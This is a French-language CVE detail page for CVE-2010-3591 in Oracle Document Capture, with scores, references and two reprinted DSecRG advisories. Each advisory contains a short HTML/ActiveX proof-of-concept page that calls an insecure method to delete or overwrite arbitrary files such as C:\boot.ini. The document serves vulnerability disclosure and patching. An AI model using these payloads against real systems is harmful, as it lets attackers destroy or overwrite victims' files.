CVE-2010-3591 : Détail

CVE-2010-3591

10.66%V3
Network
2011-01-19
14h00 +00:00
2018-10-10
16h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Unspecified vulnerability in the Oracle Document Capture component in Oracle Fusion Middleware 10.1.3.4 and 10.1.3.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Internal Operations. NOTE: the previous information was obtained from the January 2011 CPU. Oracle has not commented on claims from the original researcher that remote attackers can overwrite or delete arbitrary files via a full pathname in the second argument to the DownloadSingleMessageToFile method in the EMPOP3Lib ActiveX component (empop3.dll).

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE Other No informations.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 16055

Date de publication : 2011-01-25 23h00 +00:00
Auteur : Evdokimov Dmitriy
EDB Vérifié : No

Source: http://packetstormsecurity.org/files/view/97868/DSECRG-11-005.txt ActiveX components contain insecure methods. Digital Security Research Group [DSecRG] Advisory DSECRG-11-005 (internal #DSECRG-00154) Application: Oracle Document Capture Versions Affected: Release 10gR3 Vendor URL: www.oracle.com Bugs: insecure method, File overwriting, File deleting Exploits: YES Reported: 22.03.2010 Vendor response: 31.03.2010 Date of Public Advisory:24.01.2011 CVE-number: CVE-2010-3591 Author: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *********** Oracle Document Capture contains ActiveX components that contains insecure methods in empop3.dll Details ******* Oracle Document Capture contains ActiveX component EMPOP3Lib (empop3.dll) Lib GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24} which is contains insecure method "DownloadSingleMessageToFile" that can delete any file in system. Class EasyMailPop3 GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24} Number of Interfaces: 1 Default Interface: IPOP3Main RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False Details ******* Attacker can construct html page which call vulnerable function "DownloadSingleMessageToFile" from ActiveX component empop3.dll Example: <HTML> <HEAD> <TITLE>DSecRG</TITLE> </HEAD> <BODY> <OBJECT id='eds' classid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'></OBJECT> <SCRIPT> function Exploit(){ eds.DownloadSingleMessageToFile(1,"C:\\boot.ini",1); } Exploit(); </SCRIPT> </BODY> </HTML> References ********** http://dsecrg.com/pages/vul/show.php?id=305 http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html Fix Information ************* Information was published in CPU Jan 2011. All customers can download CPU patches following instructions from: http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html About ***** Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product "ERPSCAN security suite for SAP NetWeaver" and service "ERPSCAN Online" which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG ______________________ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polyakov@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru ----------------------------------- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. -----------------------------------
Exploit Database EDB-ID : 16053

Date de publication : 2011-01-25 23h00 +00:00
Auteur : Evdokimov Dmitriy
EDB Vérifié : No

Source: http://packetstormsecurity.org/files/view/97866/DSECRG-11-004.txt ActiveX components contain insecure methods. Digital Security Research Group [DSecRG] Advisory #DSECRG-00153 Application: Oracle Document Capture Versions Affected: Release 10gR3 Vendor URL: www.oracle.com Bugs: insecure method, File overwriting Exploits: YES Reported: 22.03.2010 Vendor response: 31.03.2010 Date of Public Advisory:24.01.2011 CVE-number: CVE-2010-3591 Author: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *********** Oracle Document Capture contains ActiveX components that contains insecure methods. Insecure method in Actbar2.ocx Details ******* Oracle Document Capture contains ActiveX component ActiveBar2Library (Actbar2.ocx) Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9} which is contains insecure method "SaveLayoutChanges" that can overwrite any unhidden file in system. Class ActiveBar2 GUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9} Number of Interfaces: 1 Default Interface: IActiveBar2 RegKey Safe for Script: True RegKey Safe for Init: True KillBitSet: False Exploit ******* Attacker can construct html page which call vulnerable function "SaveLayoutChanges" from ActiveX component Actbar2.ocx Example: <HTML> <HEAD> <TITLE>DSecRG</TITLE> </HEAD> <BODY> <OBJECT id='eds' classid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'></OBJECT> <SCRIPT> function Exploit(){ eds.SaveLayoutChanges("C:\\31337.txt",1); } Exploit(); </SCRIPT> </BODY> </HTML> References ********** http://dsecrg.com/pages/vul/show.php?id=304 http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html Fix Information ************* Information was published in CPU Jan 2011. All customers can download CPU patches following instructions from: http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html About ***** Digital Security: Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. Digital Security Research Group: International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product "ERPSCAN security suite for SAP NetWeaver" and service "ERPSCAN Online" which can help customers to perform automated security assessments and compliance checks for SAP solutions. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com http://www.erpscan.com Polyakov Alexandr. PCI QSA,PA-QSA CTO Digital Security Head of DSecRG ______________________ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: a.polyakov@dsec.ru www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru ----------------------------------- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. -----------------------------------

Products Mentioned

Configuraton 0

Oracle>>Fusion_middleware >> Version 10.1.3.4

    Oracle>>Fusion_middleware >> Version 10.1.3.5

    Références

    http://www.vupen.com/english/advisories/2011/0143
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.exploit-db.com/exploits/16055
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.securitytracker.com/id?1024981
    Tags : vdb-entry, x_refsource_SECTRACK
    http://secunia.com/advisories/42976
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/bid/45851
    Tags : vdb-entry, x_refsource_BID